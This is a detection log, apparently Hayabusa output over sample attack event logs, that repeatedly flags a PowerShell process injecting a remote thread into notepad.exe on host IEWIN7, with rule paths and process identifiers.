2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
